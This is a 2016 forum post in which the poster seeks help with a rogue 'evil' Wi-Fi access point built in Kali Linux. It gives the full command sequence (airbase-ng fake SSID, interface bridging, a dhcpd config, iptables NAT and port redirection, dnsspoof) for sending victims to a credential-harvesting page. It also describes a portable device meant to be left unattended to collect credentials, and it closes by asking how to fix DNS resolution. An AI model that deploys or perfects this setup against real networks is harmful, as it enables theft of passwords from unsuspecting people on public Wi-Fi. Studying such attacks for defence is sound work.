Post Thu Aug 25, 2016 3:33 pm

DNS issues with evil access point

Hello, I am having some issues in creating an evil access point for a security demonstration and am having some DNS issues.

Essentially what I am doing is broadcasting a fake wireless access point, bridging the connection to my ethernet to allow regular internet access, and spoofing the dns for certain websites, redirecting the use to my own credential harvesting page.

I am attempting to do all this through the CLI as a proof of concept for constructing a portable evil access point that can basically be dumped somewhere, left to harvest credentials and then collected at a later point and the harvested data dumped to a computer.

Here is an overview of the scripts I have built to perform this kind of attack:

Interfaces
==========
wlan0 (access point with gateway 192.168.0.1)
eth0 (ethernet with internet access, gateway 192.168.1.1)
at0 (bridged network interface created by airbase)

The following commands are executed in sequence:
  Code:

# Start services and monitor mode
service apache2 start
airmon-ng start wlan0
airmon-ng check kill

# Start access point
airbase-ng -c 11 -e "Wifi_Gratis" wlan0mon

# Bring up the bridge, setup the route and run the dhcp server with custom config
ifconfig at0 up &&
ifconfig at0 192.168.0.1 netmask 255.255.255.0 &&
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 &&
dhcpd

# Enable port forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward &&

# Configure the ip tables
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ##gateway on eth0
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8000

# Execute DNS spoofing attack on at0 bridged interface
dnsspoof -i at0 -f /root/RogueAP/dnshosts


And here is the config I have written for the dhcp server
  Code:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.0.0 netmask 255.255.255.0 {
   option routers 192.168.0.1;
   option subnet-mask 255.255.255.0;
   option domain-name-servers 192.168.0.1;
   range 192.168.0.2 192.168.0.40;
}


Now, on to the problem.

Say if I connected to the rogue access point with an iPhone device. It connects fine, has access to the internet, but it can only resolve the ip addresses of websites it has visited previously, meaning it cannot perform a DNS lookup for a real website, only websites where the DNS record has been cached on the device.

Will I need to enable my own full DNS or is there a way to route DNS queries directly to the service provider on eth0?

I am running the latest 64bit version of Kali installed on a notebook with Windows 7 dual-boot and an ath9k chipset wireless card.